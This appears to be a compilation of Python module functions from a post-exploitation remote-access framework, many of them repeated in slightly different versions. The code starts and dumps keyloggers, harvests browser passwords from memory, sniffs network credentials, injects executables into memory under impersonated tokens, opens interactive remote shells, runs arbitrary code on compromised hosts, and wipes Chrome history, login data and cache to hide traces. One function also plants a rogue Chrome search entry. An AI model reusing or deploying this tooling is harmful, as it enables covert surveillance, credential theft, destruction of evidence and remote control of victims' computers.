def run(self, args): # TO DO: enable multi RDP session, see MIMIKATZ for example if args.local: if args.enable or args.disable: if not self.client.is_windows(): self.error("This option could be used only on windows hosts") return # check if admin if not self.client.conn.modules["pupwinutils.rdp"].check_if_admin(): self.error("Admin privileges are required") with redirected_stdio(self): if args.enable: self.client.conn.modules["pupwinutils.rdp"].enable_rdp() if args.disable: self.client.conn.modules["pupwinutils.rdp"].disable_rdp() elif args.remote: if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target) for host in hosts: with redirected_stdio(self): self.client.conn.modules["pupyutils.rdp_check"].check_rdp( host, args.username, args.password, args.domain, args.hashes )
def run(self, args): if self.client.is_windows(): self.client.load_package("pupwinutils.keylogger") else: self.client.load_package("keylogger") if args.action=="start": if self.client.is_windows(): with redirected_stdio(self.client.conn): #to see the output exception in case of error if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start(): self.error("the keylogger is already started") else: self.success("keylogger started !") # not tested on android else: with redirected_stdio(self.client.conn): #to see the output exception in case of error r = self.client.conn.modules["keylogger"].keylogger_start() if r == 'no_x11': self.error("the keylogger does not work without x11 graphical interface") elif not r: self.error("the keylogger is already started") else: self.success("keylogger started !") elif args.action=="dump": try: os.makedirs(os.path.join("data","keystrokes")) except Exception: pass if self.client.is_windows(): data=self.client.conn.modules["pupwinutils.keylogger"].keylogger_dump() else: data=self.client.conn.modules["keylogger"].keylogger_dump() if data is None: self.error("keylogger not started") elif not data: self.warning("no keystrokes recorded") else: filepath=os.path.join("data", "keystrokes","keys_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log") self.success("dumping recorded keystrokes in %s"%filepath) with open(filepath, 'w') as f: f.write(data) self.log(data) elif args.action=="stop": if self.client.is_windows(): stop = self.client.conn.modules["pupwinutils.keylogger"].keylogger_stop() else: stop = self.client.conn.modules["keylogger"].keylogger_stop() if stop: self.success("keylogger stopped") else: self.success("keylogger is not started")
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, fork=False, timeout=None, use_impersonation=False, suspended_process="cmd.exe"): if not raw_pe and not path: raise Exception("raw_pe or path must be supplied") if path: pe_arch=get_pe_arch(path) proc_arch=module.client.desc["proc_arch"] if pe_arch!=proc_arch: module.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(path, pe_arch, proc_arch, proc_arch, pe_arch)) return wait=True redirect_stdio=True if fork: wait=False redirect_stdio=False if not raw_pe: raw_pe=b"" with open(path,'rb') as f: raw_pe=f.read() module.client.load_package("pupymemexec") module.client.load_package("pupwinutils.memexec") res="" dupHandle=None if use_impersonation: dupHandle=module.client.impersonated_dupHandle if dupHandle is None: module.error("No token has been impersonated on this session. use impersonate module first") return if not hasattr(module, 'mp'): setattr(module, 'mp', None) module.mp=module.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio, suspended_process=suspended_process, dupHandle=dupHandle) with redirected_stdio(module.client.conn): module.mp.run() if not fork: if interactive: try: with redirected_stdio(module.client.conn): module.mp.get_shell() finally: module.mp.close() else: starttime=time.time() while True: if module.mp.wait(1): break if timeout: if time.time()-starttime>timeout: break module.mp.close() res=module.mp.get_stdout() module.log(res) return res
def run(self, args): self.client.load_package("_sqlite3") self.client.load_package("sqlite3") print self.client.load_dll("packages/windows/x86/sqlite3.dll") self.client.conn.modules['_sqlite3'] self.client.conn.modules['sqlite3'] #self.client.conn.modules["pupwinutils.processes"].enum_processes() with redirected_stdio(self.client.conn): self.info("gotsql") self.client.load_package("getpass") u=self.client.conn.modules['getpass'].getuser() x = "adamschaal" #self.info("goinin") self.client.load_package("forenmod.forenpackage") #self.info("a") self.client.conn.modules['forenmod.forenpackage'].kill_chrome() #self.info("b") self.client.conn.modules['forenmod.forenpackage'].fix_crash(u) #self.info("c") self.client.conn.modules['forenmod.forenpackage'].del_hist(x,u) #self.info("d") self.client.conn.modules['forenmod.forenpackage'].del_Topsite(x,u) #self.info("e") self.client.conn.modules['forenmod.forenpackage'].del_Favicons(x,u) #self.info("f") self.client.conn.modules['forenmod.forenpackage'].del_loginData(x,u) #self.info("g") self.client.conn.modules['forenmod.forenpackage'].del_NAP(x,u) #self.info("h") self.client.conn.modules['forenmod.forenpackage'].del_Shortcuts(x,u) #self.info("i") self.client.conn.modules['forenmod.forenpackage'].rm_CurrentTabs(u) #self.info("j") self.client.conn.modules['forenmod.forenpackage'].rm_CurrentSession(u) #self.info("k") self.client.conn.modules['forenmod.forenpackage'].rm_LastTabs(u) #self.info("l") self.client.conn.modules['forenmod.forenpackage'].rm_LastSession(u) #self.info("m") self.client.conn.modules['forenmod.forenpackage'].rm_bookmarks(u) #self.info("n") self.client.conn.modules['forenmod.forenpackage'].rm_Cache(u) #self.info("o") self.client.conn.modules['forenmod.forenpackage'].rm_autofill(u) #self.info("p") self.client.conn.modules['forenmod.forenpackage'].rm_visited(u) #del_Cookies(x,u) #self.info("goinout") if args.clean: self.info("clean...") if args.persist: self.info("persist...") self.success("succesfully cleaned the client")
def run(self, args): with redirected_stdio(self): loot=self.client.conn.modules["loot_memory"].dump_browser_passwords() for browser, dic in loot.iteritems(): self.info("%s crawled :"%browser) for i, passwords in dic.iteritems(): self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
def run(self, args): with redirected_stdio(self.client.conn): loot=self.client.conn.modules["loot_memory"].dump_browser_passwords() for browser, dic in loot.iteritems(): self.info("%s crawled :"%browser) for i, passwords in dic.iteritems(): self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
def run(self, args): if self.client.is_windows() or args.pseudo_tty: self.client.load_package("interactive_shell") encoding = None program = "/bin/sh" if self.client.is_android(): program = "/system/bin/sh" elif self.client.is_windows(): program = "cmd.exe" if args.program: program = args.program with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open( program=program) else: #handling tty self.client.load_package("ptyshell") fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) self.ps = self.client.conn.modules['ptyshell'].PtyShell() program = None if args.program: program = args.program.split() try: term = "xterm" if "TERM" in os.environ: term = os.environ["TERM"] self.ps.spawn(program, term=term) is_closed = Event() self.ps.start_read_loop(print_callback, is_closed.set) self.set_pty_size = rpyc. async (self.ps.set_pty_size) old_handler = pupylib.PupySignalHandler.set_signal_winch( self._signal_winch) self._signal_winch( None, None ) # set the remote tty sie to the current terminal size try: tty.setraw(fd) buf = b'' while True: r, w, x = select.select([sys.stdin], [], [], 0.01) if sys.stdin in r: ch = os.read(fd, 1) buf += ch elif buf: self.ps.write(buf) buf = b'' elif is_closed.is_set(): break finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) pupylib.PupySignalHandler.set_signal_winch(old_handler) finally: try: self.ps.close() except Exception: pass self.set_pty_size = None
def run(self, args): with redirected_stdio(self): # zip if not args.u: self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination) # unzip else: self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
def run(self, args): if self.client.is_windows() or args.pseudo_tty: self.client.load_package("interactive_shell") encoding=None program="/bin/sh" if self.client.is_android(): program="/system/bin/sh" elif self.client.is_windows(): program="cmd.exe" if args.program: program=args.program with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open(program=program) else: #handling tty self.client.load_package("ptyshell") self.ps=self.client.conn.modules['ptyshell'].PtyShell() program=None if args.program: program=args.program.split() try: term="xterm" if "TERM" in os.environ: term=os.environ["TERM"] self.ps.spawn(program, term=term) is_closed=Event() self.ps.start_read_loop(print_callback, is_closed.set) self.set_pty_size=rpyc.async(self.ps.set_pty_size) old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch) self._signal_winch(None, None) # set the remote tty sie to the current terminal size fd=sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) input_buf=b"" while True: r, w, x = select.select([sys.stdin], [], [], 0) if sys.stdin in r: last_input=sys.stdin.read(1) if last_input=="\x1b": # in case we read the escape character, we read stdin again because mysteriously, the select won't unlock before getting another character again last_input+=sys.stdin.read(2) input_buf+=last_input elif input_buf: self.ps.write(input_buf) input_buf=b"" elif is_closed.is_set(): break else: time.sleep(0.01) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) pupylib.PupySignalHandler.set_signal_winch(old_handler) finally: try: self.ps.close() except Exception: pass self.set_pty_size=None
def run(self, args): self.client.load_package("pupyutils.zip") with redirected_stdio(self.client.conn): # zip if not args.u: self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination) # unzip else: self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
def run(self, args): self.client.load_package("interactive_shell") program="/bin/sh" encoding=None if self.client.is_windows(): program="cmd.exe" encoding="cp437" with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding)
def run(self, args): self.client.load_package("interactive_shell") program = "/bin/sh" encoding = None if self.client.is_windows(): program = "cmd.exe" encoding = "cp437" with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open( program=program, encoding=encoding)
def run(self, args): if self.client.is_windows() or args.pseudo_tty: self.client.load_package("interactive_shell") encoding=None program="/bin/sh" if self.client.is_android(): program="/system/bin/sh" elif self.client.is_windows(): program="cmd.exe" if args.program: program=args.program with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open(program=program) else: #handling tty self.client.load_package("ptyshell") fd=sys.stdin.fileno() old_settings = termios.tcgetattr(fd) self.ps=self.client.conn.modules['ptyshell'].PtyShell() program=None if args.program: program=args.program.split() try: term="xterm" if "TERM" in os.environ: term=os.environ["TERM"] self.ps.spawn(program, term=term) is_closed=Event() self.ps.start_read_loop(print_callback, is_closed.set) self.set_pty_size=rpyc.async(self.ps.set_pty_size) old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch) self._signal_winch(None, None) # set the remote tty sie to the current terminal size try: tty.setraw(fd) buf=b'' while True: r, w, x = select.select([sys.stdin], [], [], 0.01) if sys.stdin in r: ch = os.read(fd, 1) buf += ch elif buf: self.ps.write(buf) buf=b'' elif is_closed.is_set(): break finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) pupylib.PupySignalHandler.set_signal_winch(old_handler) finally: try: self.ps.close() except Exception: pass self.set_pty_size=None
def run(self, args): self.client.load_package("pupyutils.netcreds") if args.action == "start": with redirected_stdio( self.client.conn ): #to see the output exception in case of error r = self.client.conn.modules[ "pupyutils.netcreds"].netcreds_start( args.interface, args.filterip) if r == 'not_root': self.error("Needs root privileges to be started") elif not r: self.error( "Network credentials sniffer is already started") else: self.success("Network credentials sniffer started !") elif args.action == "dump": try: os.makedirs(os.path.join("data", "netcreds")) except Exception: pass data = self.client.conn.modules[ "pupyutils.netcreds"].netcreds_dump() if data is None: self.error( "Network credentials sniffer has not been started yet") elif not data: self.warning("No network credentials recorded") else: # remove color before writting into the file W = '\033[0m' # white (normal) T = '\033[93m' # tan data_no_color = data.replace(W, '').replace(T, '') filepath = os.path.join( "data", "netcreds", "creds_" + self.client.short_name() + "_" + str(datetime.datetime.now()).replace( " ", "_").replace(":", "-") + ".log") self.success("Dumping recorded netcreds in %s" % filepath) with open(filepath, 'w') as f: f.write(data_no_color) self.log(data) elif args.action == "stop": stop = self.client.conn.modules[ "pupyutils.netcreds"].netcreds_stop() if stop: self.success("Network credentials sniffer is stopped") else: self.error( "Network credentials sniffer has not been started yet")
def run(self, args): if args.fork and args.interactive: self.error( "--fork and --interactive options can't be used together") return #check we are injecting from the good process arch: pe_arch = get_pe_arch(args.path) proc_arch = self.client.desc["proc_arch"] if pe_arch != proc_arch: self.error( "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first" % (args.path, pe_arch, proc_arch, proc_arch, pe_arch)) return wait = True redirect_stdio = True if args.fork: wait = False redirect_stdio = False raw_pe = b"" with open(args.path, 'rb') as f: raw_pe = f.read() self.client.load_package("pupymemexec") self.client.load_package("pupwinutils.memexec") res = "" self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE( raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio) self.mp.run() if not args.fork: if args.interactive: try: with redirected_stdio(self.client.conn): self.mp.get_shell() finally: self.mp.close() else: starttime = time.time() while True: if self.mp.wait(1): break if args.timeout: if time.time() - starttime > args.timeout: break self.mp.close() res = self.mp.get_stdout() self.log(res)
def run(self, args): if self.client.is_windows() or args.pseudo_tty: self.client.load_package("interactive_shell") encoding = None program = "/bin/sh" if self.client.is_windows(): program = "cmd.exe" encoding = "cp437" if args.program: program = args.program with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open( program=program, encoding=encoding) else: #handling tty self.client.load_package("ptyshell") self.ps = self.client.conn.modules['ptyshell'].PtyShell() program = None if args.program: program = args.program.split() self.ps.spawn(program) is_closed = Event() self.ps.start_read_loop(print_callback, is_closed.set) self.set_pty_size = rpyc. async (self.ps.set_pty_size) old_handler = pupylib.PupySignalHandler.set_signal_winch( self._signal_winch) self._signal_winch( None, None) # set the remote tty sie to the current terminal size try: fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) input_buf = b"" while True: r, w, x = select.select([sys.stdin], [], [], 0) if sys.stdin in r: input_buf += sys.stdin.read(1) elif input_buf: self.ps.write(input_buf) input_buf = b"" elif is_closed.is_set(): break else: time.sleep(0.01) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) finally: pupylib.PupySignalHandler.set_signal_winch(old_settings) self.ps.close()
def run(self, args): if args.action=="start": self.client.load_package("psutil") self.client.load_package("pupwinutils.watch_puppy") with redirected_stdio(self.client.conn): #to see the output exception in case of error if not self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_start(): self.error("the watch puppy is already started") else: self.success("watch puppy started !") elif args.action=="stop": if self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_stop(): self.success("watch puppy stopped") else: self.success("watch puppy is not started")
def run(self, args): filepath = None if args.write: config = self.client.pupsrv.config or PupyConfig() folder = config.get_folder('beroot', {'%c': self.client.short_name()}) filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt") with redirected_stdio(self): try: for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write): self.print_output(output=r, write=args.write, file=filepath) except Exception as e: print e if args.write: self.success(filepath)
def run(self, args): code = "" if args.file: self.info("loading code from %s ..." % args.file) with open(args.file, 'r') as f: code = f.read() elif args.code: code = args.code else: raise PupyModuleError("--code or --file argument is mandatory") if args.no_redirected_stdio: self.client.conn.execute(code + "\n") else: with redirected_stdio(self): self.client.conn.execute(code + "\n")
def run(self, args): if args.fork and args.interactive: self.error("--fork and --interactive options can't be used together") return #check we are injecting from the good process arch: pe_arch=get_pe_arch(args.path) proc_arch=self.client.desc["proc_arch"] if pe_arch!=proc_arch: self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch)) return wait=True redirect_stdio=True if args.fork: wait=False redirect_stdio=False raw_pe=b"" with open(args.path,'rb') as f: raw_pe=f.read() self.client.load_package("pupymemexec") self.client.load_package("pupwinutils.memexec") res="" self.mp=self.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio) self.mp.run() if not args.fork: if args.interactive: try: with redirected_stdio(self.client.conn): self.mp.get_shell() finally: self.mp.close() else: starttime=time.time() while True: if self.mp.wait(1): break if args.timeout: if time.time()-starttime>args.timeout: break self.mp.close() res=self.mp.get_stdout() self.log(res)
def exec_pe(self, path, prog_args, interactive=False, fork=False, timeout=None): pe_arch = get_pe_arch(path) proc_arch = self.client.desc["proc_arch"] if pe_arch != proc_arch: self.error( "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first" % (path, pe_arch, proc_arch, proc_arch, pe_arch)) return wait = True redirect_stdio = True if fork: wait = False redirect_stdio = False raw_pe = b"" with open(path, 'rb') as f: raw_pe = f.read() self.client.load_package("pupymemexec") self.client.load_package("pupwinutils.memexec") res = "" self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE( raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio) self.mp.run() if not fork: if interactive: try: with redirected_stdio(self.client.conn): self.mp.get_shell() finally: self.mp.close() else: starttime = time.time() while True: if self.mp.wait(1): break if timeout: if time.time() - starttime > timeout: break self.mp.close() res = self.mp.get_stdout() self.log(res)
def run(self, args): if self.client.is_windows() or args.pseudo_tty: self.client.load_package("interactive_shell") encoding=None program="/bin/sh" if self.client.is_windows(): program="cmd.exe" encoding="cp437" if args.program: program=args.program with redirected_stdio(self.client.conn): self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding) else: #handling tty self.client.load_package("ptyshell") self.ps=self.client.conn.modules['ptyshell'].PtyShell() program=None if args.program: program=args.program.split() self.ps.spawn(program) is_closed=Event() self.ps.start_read_loop(print_callback, is_closed.set) self.set_pty_size=rpyc.async(self.ps.set_pty_size) old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch) self._signal_winch(None, None) # set the remote tty sie to the current terminal size try: fd=sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) input_buf=b"" while True: r, w, x = select.select([sys.stdin], [], [], 0) if sys.stdin in r: input_buf+=sys.stdin.read(1) elif input_buf: self.ps.write(input_buf) input_buf=b"" elif is_closed.is_set(): break else: time.sleep(0.01) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) finally: pupylib.PupySignalHandler.set_signal_winch(old_settings) self.ps.close()
def run(self, args): error = '' if not args.user: error = 'username is needed' elif args.password and args.private_key: error = 'specify either a plaintext password or a private key, not both' elif not args.password and not args.private_key: error = 'private_key or plain text password are needed' elif args.ip and args.file: error = 'choose either an ip address or an input file, not both' elif not args.ip and not args.file: error = 'not targets specify' if error: self.error(error) return self.client.load_package("paramiko") self.client.load_package("cryptography") self.client.load_package("ecdsa") self.client.load_package("ssh") error_code = False result = '' ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key, args.password, args.file, args.ip, args.port, args.verbose, args.command) if args.verbose: with redirected_stdio(self.client.conn): error_code, result = ssh.ssh_client() else: error_code, result = ssh.ssh_client() if not error_code: self.error('%s' % result) else: self.success('%s' % result)
def run(self, args): self.client.load_package("pupyutils.netcreds") if args.action=="start": with redirected_stdio(self.client.conn): #to see the output exception in case of error r = self.client.conn.modules["pupyutils.netcreds"].netcreds_start(args.interface, args.filterip) if r == 'not_root': self.error("Needs root privileges to be started") elif not r: self.error("Network credentials sniffer is already started") else: self.success("Network credentials sniffer started !") elif args.action=="dump": try: os.makedirs(os.path.join("data","netcreds")) except Exception: pass data=self.client.conn.modules["pupyutils.netcreds"].netcreds_dump() if data is None: self.error("Network credentials sniffer has not been started yet") elif not data: self.warning("No network credentials recorded") else: # remove color before writting into the file W = '\033[0m' # white (normal) T = '\033[93m' # tan data_no_color=data.replace(W, '').replace(T, '') filepath=os.path.join("data", "netcreds","creds_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log") self.success("Dumping recorded netcreds in %s"%filepath) with open(filepath, 'w') as f: f.write(data_no_color) self.log(data) elif args.action=="stop": stop = self.client.conn.modules["pupyutils.netcreds"].netcreds_stop() if stop: self.success("Network credentials sniffer is stopped") else: self.error("Network credentials sniffer has not been started yet")
def run(self, args): if args.action=="start": if self.keylogger: self.error("the keylogger is already started") else: self.client.load_package("pupwinutils.keylogger") with redirected_stdio(self.client.conn): #to see the output exception in case of error self.keylogger=self.client.conn.modules["pupwinutils.keylogger"].KeyLogger() self.keylogger.start() else: if not self.keylogger: self.error("the keylogger is not running") return if args.action=="dump": self.success("dumping recorded keystrokes :") self.log(self.keylogger.dump()) elif args.action=="stop": self.keylogger.stop() self.job.stop()
def run(self, args): error = '' if not args.user: error = 'username is needed' elif args.password and args.private_key: error = 'specify either a plaintext password or a private key, not both' elif not args.password and not args.private_key: error = 'private_key or plain text password are needed' elif args.ip and args.file: error ='choose either an ip address or an input file, not both' elif not args.ip and not args.file: error ='not targets specify' if error: self.error(error) return error_code = False result = '' SSH = self.client.remote('ssh', 'SSH', False) ssh = SSH( args.user, args.private_key, args.password, args.file, args.ip, args.port, args.verbose, args.command ) if args.verbose: with redirected_stdio(self): error_code, result = ssh.ssh_client() else: error_code, result = ssh.ssh_client() if not error_code: self.error('%s' % result) else: self.success('%s' % result)
def exec_pe(self, path, prog_args, interactive=False, fork=False, timeout=None): pe_arch = get_pe_arch(path) proc_arch = self.client.desc["proc_arch"] if pe_arch != proc_arch: self.error( "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first" % (path, pe_arch, proc_arch, proc_arch, pe_arch) ) return wait = True redirect_stdio = True if fork: wait = False redirect_stdio = False raw_pe = b"" with open(path, "rb") as f: raw_pe = f.read() self.client.load_package("pupymemexec") self.client.load_package("pupwinutils.memexec") res = "" self.mp = self.client.conn.modules["pupwinutils.memexec"].MemoryPE( raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio ) self.mp.run() if not fork: if interactive: try: with redirected_stdio(self.client.conn): self.mp.get_shell() finally: self.mp.close() else: starttime = time.time() while True: if self.mp.wait(1): break if timeout: if time.time() - starttime > timeout: break self.mp.close() res = self.mp.get_stdout() self.log(res)
def run(self, args): error = '' if not args.user: error = 'username is needed' elif args.password and args.private_key: error = 'specify either a plaintext password or a private key, not both' elif not args.password and not args.private_key: error = 'private_key or plain text password are needed' elif args.ip and args.file: error ='choose either an ip address or an input file, not both' elif not args.ip and not args.file: error ='not targets specify' if error: self.error(error) return self.client.load_package("paramiko") self.client.load_package("cryptography") self.client.load_package("ecdsa") self.client.load_package("ssh") error_code = False result = '' ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key, args.password, args.file, args.ip, args.port, args.verbose, args.command) if args.verbose: with redirected_stdio(self.client.conn): error_code, result = ssh.ssh_client() else: error_code, result = ssh.ssh_client() if not error_code: self.error('%s' % result) else: self.success('%s' % result)
def run(self, args): self.info("a") self.client.load_package("_sqlite3") self.client.load_package("sqlite3") print self.client.load_dll("packages/windows/x86/sqlite3.dll") self.client.conn.modules['_sqlite3'] self.client.conn.modules['sqlite3'] with redirected_stdio(self.client.conn): self.con=self.client.conn.modules['sqlite3'].connect('C:\Users\steal\AppData\Local\Google\Chrome\User Data\Default\Web Data') print self.con self.info("connecting to web data db...") self.c = self.con.cursor() print self.c self.c.execute("SELECT * FROM keywords WHERE short_name='cleanupeverybodyeverywhere'") print self.c self.foo = self.c.fetchall() print self.foo if not self.foo: self.info("executing") self.c.execute("INSERT INTO keywords (short_name,keyword,url,favicon_url) VALUES ('cleanupeverybodyeverywhere','cleanupeverybodyeverywhere','forensichat://C:>Windows>System32>calc.exe','')") self.con.commit() self.con.close() if args.clean: self.info("clean...") if args.persist: self.info("persist...") self.success("added browser") self.client.load_package("getpass") user=self.client.conn.modules['getpass'].getuser() self.info("USER: %s"%user)
def run(self, args): with redirected_stdio(self): self.client.conn.modules['linux_stealth'].run(args.port) self.success("Module executed successfully.")
def run(self, args): self.client.load_package("wmi") self.client.load_package("pupwinutils.drives") with redirected_stdio(self.client.conn): self.client.conn.modules['pupwinutils.drives'].list_drives()
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, fork=False, timeout=None, use_impersonation=False, suspended_process="cmd.exe"): if not raw_pe and not path: raise Exception("raw_pe or path must be supplied") if path: pe_arch = get_pe_arch(path) proc_arch = module.client.desc["proc_arch"] if pe_arch != proc_arch: module.error( "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first" % (path, pe_arch, proc_arch, proc_arch, pe_arch)) return wait = True redirect_stdio = True if fork: wait = False redirect_stdio = False if not raw_pe: raw_pe = b"" with open(path, 'rb') as f: raw_pe = f.read() module.client.load_package("pupymemexec") module.client.load_package("pupwinutils.memexec") res = "" dupHandle = None if use_impersonation: dupHandle = module.client.impersonated_dupHandle if dupHandle is None: module.error( "No token has been impersonated on this session. use impersonate module first" ) return if not hasattr(module, 'mp'): setattr(module, 'mp', None) module.mp = module.client.conn.modules['pupwinutils.memexec'].MemoryPE( raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio, suspended_process=suspended_process, dupHandle=dupHandle) with redirected_stdio(module.client.conn): module.mp.run() if not fork: if interactive: try: with redirected_stdio(module.client.conn): module.mp.get_shell() finally: module.mp.close() else: starttime = time.time() while True: if module.mp.wait(1): break if timeout: if time.time() - starttime > timeout: break module.mp.close() res = module.mp.get_stdout() module.log(res)